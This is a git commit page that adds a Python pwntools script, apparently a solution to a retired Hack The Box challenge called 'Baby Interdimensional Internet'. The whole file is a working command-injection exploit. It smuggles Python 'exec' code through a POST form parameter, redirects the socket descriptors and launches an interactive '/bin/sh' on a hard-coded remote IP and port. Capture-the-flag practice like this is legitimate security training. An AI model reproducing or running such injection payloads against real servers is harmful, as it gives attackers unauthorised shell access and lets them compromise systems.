Retired HTB Challenge: Baby Interdimensional Internet

tsalomon · Feb 18, 2021 · bbdcbc1 · bbdcbc1
1 parent 2414ea8
commit bbdcbc1
Showing 1 changed file with 34 additions and 0 deletions.
diff --git a/baby_interdimensional_internet.py b/baby_interdimensional_internet.py
@@ -0,0 +1,34 @@
+# Baby Interdimensional Internet
+# POST Parameter Command Injection
+
+from pwn import *
+
+#inject command to start interactive shell
+#redirect stdin,stdout,stderr to output
+command  = '1;exec "'
+command += 'a=__import__(\'os\');'
+command += 'b=__import__(\'subprocess\');'
+command += 'a.dup2(4, 0);'
+command += 'a.dup2(4, 1);'
+command += 'a.dup2(4, 2);'
+command += 'b.call([\'/bin/sh\', \'-i\'])"'
+
+#create the POST body
+body = 'ingredient=x&measurements={}'.format(command)
+
+#build the HTTP POST request
+post = "POST / HTTP/1.1\r\n"
+post += "Content-Type: application/x-www-form-urlencoded\r\n"
+post += "Content-Length: {}\r\n".format(len(body))
+post += "Connection: keep-alive\r\n"
+post += "\r\n"
+post += "{}\r\n".format(body)
+post += "\r\n"
+
+#use pwntools for an interactive shell
+shell = remote('167.71.143.20',32090)
+shell.send(post)
+shell.interactive()
+shell.close()
+
+